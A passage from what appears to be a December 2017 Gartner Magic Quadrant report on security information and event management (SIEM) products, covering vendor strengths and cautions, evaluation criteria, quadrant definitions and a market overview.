functionality is native to the platform.

STRENGTHS
  • ArcSight has a large installed base of customers using the SIEM product for large, complex SOC environments and for more basic log collection use cases. There is widespread professional services and third-party monitoring support for ArcSight.
  • ArcSight supports acquisition and parsing of data from a broad range of sources, connector customization that allows normalization of a broad range of event sources and an open platform that enables structured data to be used outside of the ArcSight solution.
  • ArcSight can be extensively customized to support threat management and compliance-focused use cases. ArcSight’s robust API enables extensive integrations in SOC environments.
CAUTIONS
  • Prior to the acquisition by Micro Focus, ArcSight was updating several elements of its architecture. ArcSight users and prospective customers should seek assurances that Micro Focus will meet commitments for product feature/function improvements and support. Since closing the merger with HPE, Micro Focus has stated that its current plan is to continue investment in ArcSight, leveraging the combined expertise and technology from the legacy companies for the foreseeable future.
  • Licensing may be problematic for buyers, with volume-based (for ADP), velocity-based (for ESM) and user-based (for UBA) pricing schemes. Current customers that are converting from legacy licensing models to new licenses and the ADP architecture have reported issues with license conversion complexity and costs. To address these concerns, Micro Focus has implemented changes to its license model that include a pricing option that is free of data restrictions.
  • The ArcSight architecture is undergoing changes, with the introduction of ADP, Investigate and other components to support scalable, richer analytics and response, while at the same time supporting legacy functionality. As a result, customer choices regarding the deployment of some elements of the solution can result in duplication of data.

Micro Focus (NetIQ)

NetIQ Sentinel is a SIEM solution from Micro Focus. Sentinel Enterprise is the full SIEM solution that provides SIM and SEM capabilities to support both threat detection- and compliance-oriented use cases. Sentinel for Log Management provides log management, search and reporting capabilities, and can be upgraded to Enterprise. Additional components in the platform include Identity Tracking (a combined solution of Micro Focus Identity Manager and Sentinel with user-monitoring-focused content), Change Guardian (for host-based change and file monitoring), Exploit Detection (a threat and vulnerability management intelligence subscription), Secure Configuration Manager, and Aegis (for enhanced automation to the native Sentinel iTrace workflow). Sentinel can be deployed as software on Linux or as a virtual appliance on VMware, Hyper-V and Xen, and allows for flexible horizontal scaling. Sentinel is licensed based on EPS, event sources and optional components. Multitenant capabilities are natively supported.

Over the past 12 months, Micro Focus introduced Sentinel version 8 that includes an optional big data storage back end built on Cloudera Hadoop and Threat Response Dashboard. Other functional and operational enhancements were also added.

STRENGTHS
  • Sentinel Enterprise supports organizations that have large-scale deployment requirements underpinned by core SIEM capabilities, along with native workflow and automation capabilities.
  • Tight integration between Micro Focus’ IAM, SIEM and IT operations tools provides organizations with a single view into user activity across the IT environment.
  • Sentinel’s Hadoop-based log management tier provides flexible and horizontally scalable data collection, along with support for third-party solutions that can integrate with data from Hadoop platforms (e.g., UEBA tools).
  • Sentinel’s architecture is one of the simpler solutions to deploy and manage compared to competing products. Scaling and distribution-only require installation of more Sentinel instances.
CAUTIONS
  • The merger of Micro Focus and the software business from HPE resulted in ArcSight SIEM technology becoming part of Micro Focus. Users and prospective buyers should seek assurances from Micro Focus regarding roadmaps. Since closing the merger with HPE, Micro Focus has stated that its current plan is to continue investment in Sentinel and ArcSight, leveraging the combined expertise and technologies from both for the foreseeable future.
  • Advanced analytics in Sentinel are lagging compared to competing SIEM solutions. However, support for Hadoop-based event and data management should make integration with stand-alone UEBA solutions easier.
  • Support for log and event data collection and monitoring for SaaS, such as Office 365, Salesforce and Box, is lacking.
  • Integration of third-party solutions and content is provided, but the lack of an app store experience makes it less user-friendly than competitive products.
  • Micro Focus NetIQ Sentinel has low visibility with Gartner clients in competitive evaluations of SIEM platforms.

Rapid7

InsightIDR is Rapid7’s SIEM solution that is delivered as a service via the Insight platform. The solution consists of the InsightIDR service, EDR agents and honeypots. InsightIDR provides core SIEM features like log collection and management, threat detection rules and correlations, advanced analytics, dashboards, case management, and workflow and reporting. InsightIDR is built on Rapid7’s UserInsight (now InsightUBA) UEBA solution and the acquisition of Logentries. Advanced analytics with a focus on user behavior is a core component of InsightIDR. Buyers deploying the solution will need to install Collectors, available for Windows server or Linux and usually deployed in a ratio of one per location (physical and IaaS), to collect, aggregate and forward logs to the InsightIDR platform. The EDR agents also support local event log forwarding. Scalability is managed by Rapid7. Rapid7’s managed detection and response (MDR) service provides 24/7 SEM for buyers that require a service overlay. InsightIDR is licensed by annual subscriptions based on the number of monitored assets, which is any device connected to the buyer’s network that generates security data (e.g., desktops, laptops, tablets and servers). Data retention is 90 days, but extended data storage can be added for an additional charge.

STRENGTHS
  • InsightIDR is delivered as a service, thus the architecture and implementation is simplified. Ongoing maintenance of the platform (performance management, upgrades, scaling) is not required of the user as it’s fully managed by Rapid7.
  • Advanced analytics, particularly UEBA, is provided as part of the core solution.
  • Monitoring and responding to alerts is supported by the guided investigation feature, making it easier for less experienced users to leverage the solution.
  • EDR and honeypot technology are included with the price of the solution, allowing users to leverage advanced threat detection technologies along with InsightIDR.
CAUTIONS
  • InsightIDR is relatively new to the SIEM solution market and is less feature-rich compared with more mature SIEM solutions in areas such as reporting and the number of supported log event and data sources (but popular SaaS vendors are natively supported).
  • Workflow and case management is basic, and there is a lack of orchestration and response features. Rapid7 acquired an IT operations and security orchestration and automation company, Komand, in July 2017, which could address this gap in the future.
  • The as-a-service model may not meet the requirements of all buyers. There is no on-premises version of the solution available to buyers that have concerns about transmitting data and that data being stored off-premises. If network connectivity to Rapid7 is impaired, availability to the solution will be affected.

Securonix

Securonix’s SIEM platform is branded as Snypr Security Analytics and runs on top of a Hadoop big data platform. Snypr incorporates an event and data collection and management tier, advanced analytics that include native UEBA functionality as well as a threat library of traditional signatures and rules, and case management and workflow functions. Snypr components include the Console, which provides the UI and configuration functions; Search Service for indexing and searching across all stored data; Enrichment Service for handling data parsing, normalization and event enrichment; Correlation Service for correlation rules; Behavior Science for ML analytics; Risk Scoring Service for threat modeling and indicator-based analytics; Storage Service; Indexing Service; Centralized Ingestion Service; and Ingesters for collecting and forwarding data to the Centralized Ingestion Service. Premium apps include prepackaged behavior models, rules, reports and dashboards across a variety of security monitoring use cases, such as privileged account misuses, data security, cyberthreats, access, application security, cloud security and fraud. Advanced incident investigation and threat hunting requirements are supported by Securonix’s Spotter capability. Snypr can be deployed in a variety of ways, including software only that includes the Hadoop environment, or as software that can use a buyer’s existing Hadoop environment. For faster implementations, both physical appliance and hosted as-a-service options are available. Securonix licenses the solution as a term model based on the number of users in an organization for Snypr, premium content apps.

Over the past 12 months, Securonix added improvements around SEM, such as use-case-specific packaged content; enhancements in dashboard features and functionality that help address compliance-, threat- and operational-driven uses; the Securonix Threat Model Exchange for users to share use-case content from a central community-driven location; and the introduction of an as-a-service option.

STRENGTHS
  • Securonix Snypr provides both rule-based and UEBA capabilities as part of the core platform.
  • The Securonix licensing model is straightforward and easy for buyers to understand.
  • Securonix has a large set of partners and supports a wide variety of third-party solutions out of the box, including endpoint protection platforms, data loss prevention, cloud access security brokers, firewalls, healthcare solutions and access management solutions.
CAUTIONS
  • Native workflow and case management is relatively basic. More advanced orchestration and automation capabilities are available through API connection. Integrations with third-party solutions, such as ServiceNow, Jira and Remedy service desk solutions, are supported, as well as SOAR solutions like Microsoft-Hexadite and Phantom.
  • Since Snypr runs on a commercial Hadoop platform, it introduces a different architecture compared to more traditional SIEM solutions, and may require a learning curve to understand how to manage, monitor and troubleshoot the various components running on the platform (e.g., Kafka, Solr, HBase, Spark, HDFS, etc.)
  • Securonix lacks native advanced threat defense solutions, relying on integrations with third-party solutions for those functions (e.g., host and network forensics).

SolarWinds

SolarWinds Log & Event Manager (LEM) provides SEM and SIM functionality delivered as a virtual appliance for VMware and Hyper-V platforms. SolarWinds LEM is composed of Manager, which provides central management of the overall solution as well as log and event management and storage; Console, which provides the user interface; and Agents. The LEM Agents provide real-time event collection from endpoints, handle encryption and compression of data sent to the Manager, and also provide basic DLP (called USB Defender), FIM and automated, active response capabilities. Support for other security monitoring and context sources, such as network traffic, application and virtualized platform monitoring, is available through other SolarWinds solutions such as Virtualization Manager, Network Performance Monitor, and Server & Application Monitor. SolarWinds LEM is licensed per number of event source nodes and includes all components, including Agents and threat intelligence feeds.

Over the past 12 months, SolarWinds added multifactor authentication to the Console, along with feature and functionality upgrades for new device and application event sources. The vendor also improved capabilities for monitoring LEM health through other SolarWinds applications.

STRENGTHS
  • SolarWinds LEM provides a well-integrated solution across a variety of IT operation capabilities, making it a good option for SMBs where security operations responsibilities are federated across IT teams and staff.
  • LEM supports a variety of event sources, including nonevent data sources that can be integrated into its analytics and correlation rules.
  • SolarWinds’ simple architecture, easy licensing, and robust out-of-the-box content and features — some found in more complex SIEM solutions — make it a good fit for SMB security operations and compliance use cases.
  • The automated response capability based on the endpoint agent for Windows provides some threat containment and quarantine control capabilities not normally found with many competing SIEM solutions.
  • SolarWinds has moderate visibility with Gartner clients, particularly midsize and smaller enterprise clients.
CAUTIONS
  • SolarWinds LEM is a closed ecosystem, limiting the ability to integrate it with third-party security solutions, particularly advanced threat detection, threat intelligence feeds and UEBA tools. Integrations with service desk tools are also limited to one-way connectivity via email and SNMP.
  • LEM’s architecture scales horizontally to support thousands of nodes, but it doesn’t scale vertically and has an event data storage limit, which the vendor plans to address in a future release.
  • Monitoring of SaaS is not supported, and monitoring of IaaS is limited. Buyers that wish to extend monitoring to networks and applications must purchase other SolarWinds solutions to address those requirements.

Splunk

Splunk’s Security Intelligence Platform is composed of Splunk Enterprise and two premium solutions, Enterprise Security (ES) and Splunk User Behavior Analytics (UBA). Splunk Enterprise is the core component of the product, providing event and data collection, a variety of analytics capabilities, search, and visualizations. Splunk Enterprise (aka Core Splunk) and Splunk Cloud provide use-case-agnostic data analysis capabilities that are used for various purposes like IT operations, application and network performance monitoring, business intelligence, and some security use cases. The premium ES solution delivers most of the security-monitoring-specific capabilities, including prepackaged security-specific queries, visualizations and dashboards, as well as case management, workflow and incident response capabilities. UBA adds machine-driven, advanced analytics that complement the query-oriented approach of ES. Splunk offers a variety of complementary apps for security use cases, made available through Splunkbase. Example apps include App for PCI Compliance; Stream, which ingests network packet data directly off the wire; Analytics for Hadoop (formerly Hunk), which integrates Splunk with Hadoop environments; and Machine Learning Toolkit for users that want to create their own ML-driven analytics. Splunk supports a variety of deployment options, such as software that can be run on-premises, in IaaS and as a hybrid model. Splunk Cloud is a Splunk-hosted and -operated SaaS solution using AWS infrastructure. Core Splunk and Splunk Cloud components consist of Universal Forwarders, Indexers and Search Heads supporting n-tier architectures, as well as multiple use cases and premium solutions. Splunk is licensed based on the amount of data ingested into the platform, measured in gigabytes per day. ES is also licensed by gigabytes per day, whereas UBA is licensed by the number of user accounts in an organization, and all these are available either as a perpetual or term license.

Over the past 12 months, Splunk has primarily delivered a variety of performance and usability enhancements to Core, ES and UBA. Splunk introduced a new open-visualization approach and the Machine Learning Toolkit app that supports user-generated, machine-based analytics. Support for Okta, Azure AD and ADFS was added. Enhancements were also made to the incident response features in ES (called Adaptive Response), further enabling orchestration and automated response capabilities. Improved integration between ES and UBA events, alerts and identity resolution were also added.

STRENGTHS
  • Splunk provides a full suite of solutions oriented toward SEM that allow users to grow into the platform over time (e.g., starting with Core, then adding ES and UBA).
  • Advanced analytics capabilities are available through a variety of means across the Splunk ecosystem (e.g., built into the core search capabilities, with Machine Learning Toolkit, prepackaged in UBA or via third-party app providers).
  • Splunk has a large partner ecosystem that provides integration and Splunk-specific content that is made available through the Splunkbase application store.
  • Many organizations start implementing Splunk for other use cases, easing the path for security teams looking to add a SIEM solution to their environment as the core infrastructure and event log sources are already in place.
  • Splunk has significant visibility with Gartner clients, consistently appearing on buyers’ shortlists.
CAUTIONS
  • Gartner clients that have implemented Splunk consistently raise concerns about the licensing model and overall cost to implement the solution. Splunk has introduced new licensing approaches, such as the Enterprise Adoption Agreement (EAA) as well as additional license headroom for new users with periodic license true-ups, to address these concerns.
  • Splunk UBA is visible on shortlists of Splunk users seeking to add UEBA features, but competes with other UEBA solutions, some of which also offer SIEM functionality. Buyers considering using Splunk for SIEM and a third-party solution for UEBA must validate the degree of integration of the solutions and assess the commitment of the respective vendors to continued integration.
  • Splunk does not offer an appliance version of the solution. Organizations that want an on-premises appliance version must work with a Splunk partner that provides the integration on supported hardware.

Trustwave

Trustwave’s SIEM solution is composed of two versions — SIEM Enterprise and Log Management Enterprise (LME). Both products complement their broader security solution offerings across network, endpoint, and content and data security. Customers consuming SIEM Enterprise as a service leverage the local collector appliance (LCA). The SIEM Enterprise solution is composed of the following components: DA or LCA for event and data collection and normalization; Threat Detection and Threat Evaluation (TD&TE) for real-time analytics and alerting; and the Secure Data Warehouse (SDW) for data storage and historical analysis. SIEM Enterprise, LME and LCA can be deployed as physical or virtual appliances. The architecture can run as an all-in-one solution, and can scale both horizontally and vertically across on-premises and IaaS environments (e.g., a hybrid approach). Trustwave offers a variety of co-managed or hybrid, services augmenting its security management products. Trustwave’s licensing is primarily based on appliance costs and velocity of events processed per day (EPD). Services are charged for based on the size of the SIEM environment, and number and types of event sources.

Over the past 12 months, Trustwave has made additions and enhancements to the core platform, primarily around event collection and parsing; connectivity to cloud-based services; added support for deployment in AWS, Azure and CenturyLink; and improved storage capabilities and security.

STRENGTHS
  • Trustwave has built integrations across its security product portfolio, making its SIEM a viable option for customers of other Trustwave security products.
  • Trustwave offers flexible deployment and service options, including co-management and hybrid deployments, which is a good fit for midmarket organizations and buyers with diverse IT environments (across geographies, on-premises and IaaS).
  • SIEM Enterprise has good out-of-the-box support for event and data sources, as well as reports across a variety of regulatory and security frameworks.
  • SIEM Enterprise provides core SEM and SIM capabilities that can support both small environments and large organizations and MSSPs requiring multitenant support.
  • Midmarket customers can adopt LME and then grow into SIEM Enterprise via a simple license key upgrade.
CAUTIONS
  • Trustwave SIEM Enterprise lags the competition in integration with third-party security solutions. The addition of RESTful API support, which Trustwave added this year, should make this easier in the future.
  • SIEM Enterprise lacks advanced analytics and user-behavior-based analytics, as well as integration with big data solutions and stand-alone UEBA solutions.
  • Threat intelligence feeds are not provided out of the box. Buyers must add on Trustwave SpiderLabs research team feeds as a premium. Native SIEM integration with third-party threat intelligence feeds is not directly supported.
  • Trustwave has little visibility in competitive evaluations of SIEM solutions among Gartner clients.

Venustech

The Venustech SIEM solution is composed of various components under the Venusense Unified Security Management (USM) product, which includes modules for Security Analytics (SA), Network Behavior Analysis (NBA), Configuration Verification System (CVS) and Business Security Management (BSM). Venusense SA provides log collection, normalization and storage, and an analytics engine for threat detection and compliance use cases. It is based on a big data platform, with both Hadoop and Elasticsearch options available, that enables ML analytics in addition to standard correlation-based detection. The solution can be deployed via software, or as a virtual or physical appliance (the NBA solution is only available as a physical appliance). Venustech also offers a variety of security technologies in addition to its SIEM solution, focused on the Chinese and Asia/Pacific region markets, with solutions that cover firewalls and UTMs, web application firewalls, intrusion detection, vulnerability scanning, VPN, and other products. The solution is licensed by the core product version (back-end data tier), number of data source nodes and add-on functional modules.

Over the past year, Venustech introduced a number of new capabilities and enhancements, including its big data architecture and new UI based on HTML5, support for OT/ICS environments, and a new version of its NBA tool.

STRENGTHS
  • Venustech is a good solution for Chinese organizations, both midsize and enterprise-sized, and buyers in the Asia/Pacific markets where Venustech’s security solutions are used. Both Chinese and English are supported out of the box.
  • Venustech’s SIEM solution provides core SEM and SIM functionality that can be expanded to address a variety of network-based monitoring, as well as other security operations and risk management capabilities.
  • The Venustech SIEM architecture is straightforward and offers flexible, horizontal scaling.
  • Venustech’s SIEM solution provides a variety of data management tiers to fit different buyer types (e.g., midsize versus large enterprises).
  • Advanced analytics using ML for modeling network-based entity behavior is provided out of the box.
CAUTIONS
  • Venustech’s SIEM solution lacks the ability to monitor IaaS and SaaS solutions popular outside of the Chinese market, such as AWS, Azure, Office 365, Box and Salesforce. Support is provided for Alibaba Cloud and Tencent Cloud environments.
  • Venustech offers three versions of data management to support small- to large-scale deployments. Potential customers must understand the use cases and data volumes they need to support in order to choose the appropriate data management architecture.
  • The number of out-of-the-box parsers and report templates, especially regulatory reports outside those needed by Chinese organizations, is fewer than competing SIEM solutions.
  • Venustech has little visibility with Gartner clients, including those in the Asia/Pacific region, relative to other competing SIEM solutions.

Vendors Added and Dropped

We review and adjust our inclusion criteria for Magic Quadrants as markets change. As a result of these adjustments, the mix of vendors in any Magic Quadrant may change over time. A vendor’s appearance in a Magic Quadrant one year and not the next does not necessarily indicate that we have changed our opinion of that vendor. It may be a reflection of a change in the market and, therefore, changed evaluation criteria, or of a change of focus by that vendor.

Added

  • Exabeam
  • FireEye
  • Rapid7
  • Securonix
  • Venustech

Dropped

No vendors were dropped from this Magic Quadrant.

Inclusion and Exclusion Criteria

The inclusion criteria represent the specific attributes that analysts believe are necessary for inclusion in this research.

To qualify for inclusion:

  • The product must be generally available and provide SIM and SEM capabilities.
  • The product must support data capture from heterogeneous data sources, including network devices, security devices, security programs and servers.
  • The vendor must appear on the SIEM product evaluation lists of end-user organizations.
  • The solution must be delivered to the customer environment as a software- or appliance-based product or in an as-a-service model.
  • SIEM revenue (net-new license revenue plus maintenance) must be at least $15 million for 2016.

Evaluation Criteria

Ability to Execute

  • Product or Service evaluates the vendor’s ability and track record to provide product functions in areas such as real-time security monitoring, security analytics, incident management and response, reporting, and deployment simplicity.
  • Overall Viability includes an assessment of the technology provider’s financial health, the financial and practical success of the overall company, and the likelihood that the technology provider will continue to invest in SIEM technology.
  • Sales Execution/Pricing evaluates the technology provider’s success in the SIEM market and its capabilities in presales activities. This includes SIEM revenue and the installed base size, growth rates for SIEM revenue and the installed base, presales support, and the overall effectiveness of the sales channel. The level of interest from Gartner clients is also considered.
  • Market Responsiveness/Record evaluates the match of the SIEM offering to the functional requirements stated by buyers at acquisition time, and the vendor’s track record in delivering new functions when they are needed by the market. Also considered is how the vendor differentiates its offerings from those of its major competitors.
  • Marketing Execution evaluates the SIEM marketing message against our understanding of customer needs, and also evaluates any variations by industry vertical or geographic segments.
  • Customer Experience is an evaluation of product function and service experience within production environments. The evaluation includes ease of deployment, operation, administration, stability, scalability and vendor support capabilities. This criterion is assessed by conducting surveys of vendor-provided reference customers, in combination with feedback via inquiry, Peer Insights and other interactions from Gartner clients that are using or have completed competitive evaluations of the SIEM offering.
  • Operations is an evaluation of the organization’s service, support and sales capabilities, and includes an evaluation of these capabilities across multiple geographies
Table 1.   Ability to Execute Evaluation Criteria

Evaluation Criteria

Weighting

Product or Service

High

Overall Viability

High

Sales Execution/Pricing

High

Market Responsiveness/Record

High

Marketing Execution

Medium

Customer Experience

High

Operations

High

Source: Gartner (December 2017)

Completeness of Vision

  • Market Understanding evaluates the ability of the technology provider to understand current and emerging buyer needs and to translate those needs into products and services. SIEM vendors that show the highest degree of market understanding are adapting to customer requirements in areas such as early targeted attack and breach detection, and simplified implementation and operation, while also meeting compliance reporting requirements.
  • Marketing Strategy evaluates the vendor’s ability to effectively communicate the value and competitive differentiation of its SIEM offering.
  • Sales Strategy evaluates the vendor’s use of direct and indirect sales, marketing, service, and communications affiliates to extend the scope and depth of market reach.
  • Offering (Product) Strategy is an evaluation of the vendor’s approach to product development and delivery that emphasizes functionality and feature sets as they map to current requirements. Development plans during the next 12 to 18 months are also evaluated. Because the SIEM market is mature, there is little differentiation between most vendors in areas such as support for common network devices, security devices, OSs and consolidated administration capabilities. In this evaluation, we neutralized the relative evaluations of vendors with capabilities in these areas, but there would be a severe “vision penalty” (that is, a lower rating on the Completeness of Vision axis) for a vendor that has shortcomings in this area. We continue to place greater weight on current capabilities that aid in targeted attack detection, including:
    • Vendor capabilities for profiling and anomaly detection to complement existing rule-based correlation.
    • Threat intelligence and business context integration, including automated updates, filtering, and usage within rules, alerts and reports.
    • User monitoring capabilities, including monitoring of administrative policy changes and integration with IAM technologies, for automated import of access policy (user context) for use in monitoring. We also evaluate predefined analytics for user behavior analysis.
    • Data access monitoring capabilities, which include direct monitoring of database logs and integration with database audit and protection products, DLP integration, and FIM through native capability and integration with third-party products.
    • Application layer monitoring capabilities, including integration with third-party applications (for example, ERP financial and HR applications, and industry vertical applications), for the purpose of user activity and transaction monitoring at that layer; the external event source integration interface that is used to define normalizers and parsers for the log formats of an organization’s in-house-developed applications; and the ability to derive application context from external sources.
    • Analytics, an important capability to support the early detection of targeted attacks and breaches. SIEM vendors have long provided query capabilities against the primary storage tiers of SIEM technology. In order to be effective for early breach detection, the analytics capability must incorporate context about users, assets, threats and network activity, and must also provide query performance that supports an iterative approach to investigation. Some SIEM vendors have introduced separate data stores to hold very large amounts of security event, content and contextual data, optimized for applying advanced analytics. A number of SIEM vendors have also built connectors from the SIEM technology to industry-standard big data repositories.
    • Inclusion of advanced threat detection, endpoint and network traffic monitoring, and packet capture capabilities, and integration with third-party technologies that provide these functions for more effective early breach detection.
  • Despite the vendor focus on expansion of capability, we continue to heavily weight simplicity of deployment and ongoing support. Users, especially those with limited IT and security resources, still value this attribute over breadth of coverage beyond basic use cases. SIEM products are complex and tend to become more so as vendors extend capabilities. Vendors that are able to provide effective products that users can successfully deploy, configure and manage with limited resources will be the most successful in the market.
  • We evaluate options for co-managed or hybrid deployments of SIEM technology and supporting services because a growing number of Gartner clients are anticipating or requesting ongoing service support for monitoring or managing their SIEM technology deployments.
  • Vertical/Industry Strategy evaluates vendor strategies to support SIEM requirements that are specific to industry verticals.
  • Innovation evaluates the vendor’s development and delivery of SIEM technology that is differentiated from the competition in a way that uniquely meets critical customer requirements. Product capabilities and customer use in areas such as application layer monitoring, fraud detection and identity-oriented monitoring are evaluated, in addition to other capabilities that are product-specific and needed and deployed by customers. There is a strong weighting of capabilities that are needed for advanced threat detection and incident response: user, data and application monitoring, ad hoc queries, visualization, orchestration and incorporation of context to investigate incidents, and workflow/case management features. There is also an evaluation of capabilities for monitoring cloud environments.
  • For Geographic Strategy, although the North American and European markets produce the most SIEM revenue, Latin America and the Asia/Pacific region are growth markets for SIEM and are driven primarily by threat management and secondarily by compliance requirements. Our overall evaluation of vendors in this Magic Quadrant includes an evaluation of vendor sales and support strategies for those geographies.
Table 2.   Completeness of Vision Evaluation Criteria

Evaluation Criteria

Weighting

Market Understanding

High

Marketing Strategy

Medium

Sales Strategy

Medium

Offering (Product) Strategy

High

Business Model

Not Rated

Vertical/Industry Strategy

Medium

Innovation

High

Geographic Strategy

Medium

Source: Gartner (December 2017)

Quadrant Descriptions

Leaders

The SIEM Leaders quadrant is composed of vendors that provide products that are a strong functional match to general market requirements, have been the most successful in building an installed base and revenue stream within the SIEM market, and have a relatively high viability rating (due to SIEM revenue or SIEM revenue in combination with revenue from other sources). In addition to providing technology that is a good match to current customer requirements, Leaders also show evidence of superior vision and execution for emerging and anticipated requirements. They typically have relatively high market share and/or strong revenue growth, and have demonstrated positive customer feedback for effective SIEM capabilities and related service and support.

Challengers

The Challengers quadrant is composed of vendors that have multiple product and/or service lines, at least a modest-size SIEM customer base, and products that meet a subset of the general market requirements. As the SIEM market continues to mature, the number of Challengers has dwindled. Vendors in this quadrant would typically have strong execution capabilities, as evidenced by financial resources, a significant sales and brand presence garnered from the company as a whole, or from other factors. However, Challengers have not demonstrated a complete set of SIEM capabilities or they lack the track record for competitive success with their SIEM technologies, compared with vendors in the Leaders quadrant.

Visionaries

The Visionaries quadrant is composed of vendors that provide products that are a strong functional match to general SIEM market requirements, but have a lower Ability to Execute rating than the Leaders. This lower rating is typically due to a smaller presence in the SIEM market than the Leaders, as measured by installed base or revenue size or growth, or by smaller overall company size or general viability.

Niche Players

The Niche Players quadrant is composed primarily of vendors that provide SIEM technology that is a good match to a specific SIEM use case or a subset of SIEM functional requirements. Niche Players focus on a particular segment of the client base (such as the midmarket, service providers, or a specific geographic region or industry vertical) or may provide a more limited set of SIEM capabilities. In addition, vendors in this quadrant may have a small installed base or be limited, according to Gartner’s criteria, by a number of factors. These factors may include limited investments or capabilities, a geographically limited footprint, or other inhibitors to providing a broader set of capabilities to enterprises now and during the 12-month planning horizon. Inclusion in this quadrant does not reflect negatively on the vendor’s value in more narrowly focused markets or use cases.

Context

SIEM technology provides:

  • SIM — Log management, analytics and compliance reporting
  • SEM — Real-time monitoring and incident management for security-related events from networks, security devices, systems and applications

SIEM technology is typically deployed to support three primary use cases:

  • Advanced threat detection — Monitoring, alerting in real time, and longer-term analysis and reporting of trends and behaviors regarding user activity, data access, and application activity. Threat detection includes incorporation of threat intelligence and business context, in combination with effective ad hoc query capabilities.
  • Basic security monitoring — Log management, compliance reporting and basic real-time monitoring of selected security controls.
  • Investigation and incident response — Dashboards and visualization capabilities, as well as workflow and documentation support to enable effective incident identification, investigation and response.

Organizations should define their specific functional and operational requirements, and consider SIEM products from vendors in every quadrant of this Magic Quadrant. Product selection decisions should be driven by organization-specific requirements in areas such as the relative importance of basic capabilities versus advanced features; budget constraints; the scale of the deployment; complexity of product (deploying, running, using and supporting); the IT organization’s project deployment and technology support capabilities; and integration with established applications, data monitoring and identity management infrastructure (see “Toolkit: Security Information and Event Management RFP” ).

Security and risk management leaders considering SIEM deployments should first define the requirements for SEM and reporting. The requirements definition should include capabilities that will be needed for subsequent deployment phases. The project will benefit from the input of other groups, including audit/compliance, identity administration, IT operations and application owners (see “How to Deploy SIEM Technology” ). Organizations should also describe their network and system deployment topology, and assess event rates, so that prospective SIEM vendors can propose solutions for company-specific deployment scenarios. The requirements definition effort should also include phased deployments and enhancements beyond the initial use cases. This Magic Quadrant evaluates technology providers with respect to the most common technology selection scenario — a SIEM project that is funded to satisfy a combination of threat monitoring/detection/response and compliance reporting requirements.

Market Overview

During the past year, demand for SIEM technology has remained strong. The SIEM market grew from $2.001 billion in 2015 to $2.167 billion in 2016 (see “Forecast: Information Security, Worldwide, 2015-2021, 3Q17 Update” ). Threat management is now the primary driver, and general monitoring and compliance remains secondary. In North America, there continue to be many new deployments by organizations with limited security resources that need to improve monitoring and breach detection — often at the insistence of larger customers or business partners. Compliance reporting also continues as a requirement, but most discussions with Gartner clients are security-focused, and compliance reporting is regarded as “table stakes.” Demand for SIEM technology in Europe and the Asia/Pacific region remains steady, driven by a combination of threat management and compliance requirements. Growth rates in the less mature markets of the Asia/Pacific region and Latin America are much higher than those in the more mature North American and European markets. As a consequence, our overall evaluation of vendors in this Magic Quadrant includes an evaluation of vendor sales and support strategies for those geographies.

There continue to be new deployments by larger companies that are conservative adopters of technology. Large, late adopters and smaller organizations place high value on deployment and operational support simplicity. We continue to see large companies that are re-evaluating SIEM vendors to replace SIEM technology associated with incomplete, marginal or failed deployments.

The SIEM market is mature and very competitive. We are in a broad adoption phase, in which multiple vendors can meet the basic requirements of a typical customer. The greatest area of unmet need is effective detection of targeted attacks and breaches. Organizations are failing at early breach detection, with more than 80% of breaches undetected by the breached organization. The situation can be improved with threat intelligence, behavior profiling and effective analytics. SIEM vendors continue to increase their native support for behavior analysis capabilities as well as integrations with third-party technologies, and Gartner customers are increasingly expressing interest in developing use cases based on behavior.

SIEM deployments tend to grow in scope over a three-year period to include more use cases, and more event sources. As the number and complexity of use cases increases, there is typically greater demand for resources to run, tune and operate the SIEM, and to respond to incidents.

SIEM Vendor Landscape

The vendor landscape for SIEM is evolving, with several new entrants to the Magic Quadrant this year. Exabeam, FireEye, Rapid7, Securonix and Venustech have been added, as these vendors have added support for SIEM functions, and compete for SIEM budget with other vendors in the Magic Quadrant. Venustech is based in China, with aims of expansion into Europe. Exabeam and Securonix have added SIEM functionality to their previously UEBA-focused products, and FireEye has evolved to add SIEM as a service to its advanced threat detection platform. The SIEM market continues to be dominated by relatively few large vendors — Micro Focus (including the ArcSight and Sentinel SIEMs) IBM, McAfee (previously Intel Security) and Splunk — that command more than 60% of market revenue. Smaller SIEM vendors are typically focused on specific market segments, such as buyers of their other products, buyers seeking SIEM plus monitoring services, or MSSP or MSP providers.

Leading SIEM vendors continue to focus on targeted attack and breach detection through incorporation of threat intelligence, analytics, profiling and anomaly detection, and endpoint and network activity monitoring.

Leading SIEMs have integrations with big data platforms (the vendors’ own, where they have them or open-source options like Hadoop). A number of vendors with in-house security research capabilities (IBM, McAfee, RSA and Trustwave) provide integration with proprietary threat intelligence content. Vendors that have both SIEM and MSSP businesses (EventTracker, IBM and Trustwave) are marketing co-managed SIEM technology deployments that include a range of monitoring services. Rapid7 and FireEye offer as-a-service SIEM.

Customer’s adopting SIEM solutions that have emerged from UEBA vendors need to plan for changes to the way analysts use the tools. The tools primarily emphasize a user-based approach to monitoring for threats, compared to traditional approaches of event-based monitoring oriented around IP addresses and hostnames. SIEM solutions delivered entirely on big data platforms are just emerging in the market and buyers should consider the potential operational impacts and expertise requirements as these platforms are more complex and newer than other SIEM solutions.

Several vendors are not included in the Magic Quadrant because of a specific vertical-market focus and/or SIEM revenue and competitive visibility levels:

  • Odyssey Consultants, based in Cyprus, and LogPoint, based in Denmark, offer SIEMs based on modern, big data and analytics architectures, but currently have very limited visibility among Gartner customers.
  • FairWarning provides privacy breach detection and prevention solutions for the healthcare market that entail user activity and resource access monitoring at the application layer, and has expanded to include security monitoring for Salesforce.
  • Huntsman Security (part of Tier-3) is a SIEM vendor with a presence primarily in the U.K. and Australia. The Huntsman Enterprise SIEM can be augmented with modules to support behavioral anomaly detection and threat intelligence.
  • Lookwise (developed by S21sec) has a market presence primarily in Spain and South America. The distinguishing characteristic of Lookwise is the threat intelligence feeds from S21sec, which are focused on the banking and critical infrastructure sectors.
  • HelpSystems, with its Vityl product suite, provides operational event correlation, business process monitoring and SIEM solutions to customers in Europe and South America.

Customer Requirements — Security Monitoring and Compliance Reporting for Systems, Users, Data and Applications

Customers remain primarily focused on security use cases for SIEM, with compliance typically a secondary requirement. The security organization often wants to employ SIEM to improve capabilities for external and internal threat discovery and incident management (see “Use SIEM for Targeted Attack Detection” ). As a consequence, there are requirements for user activity and resource access monitoring for host systems and applications (see “Effective Security Monitoring Requires Context” ). In this year’s Magic Quadrant, we continue to place greater weight on capabilities that aid in targeted attack detection, including support for user activity monitoring, application activity monitoring, profiling and anomaly detection, threat intelligence, and effective analytics, as well as on incident response features.

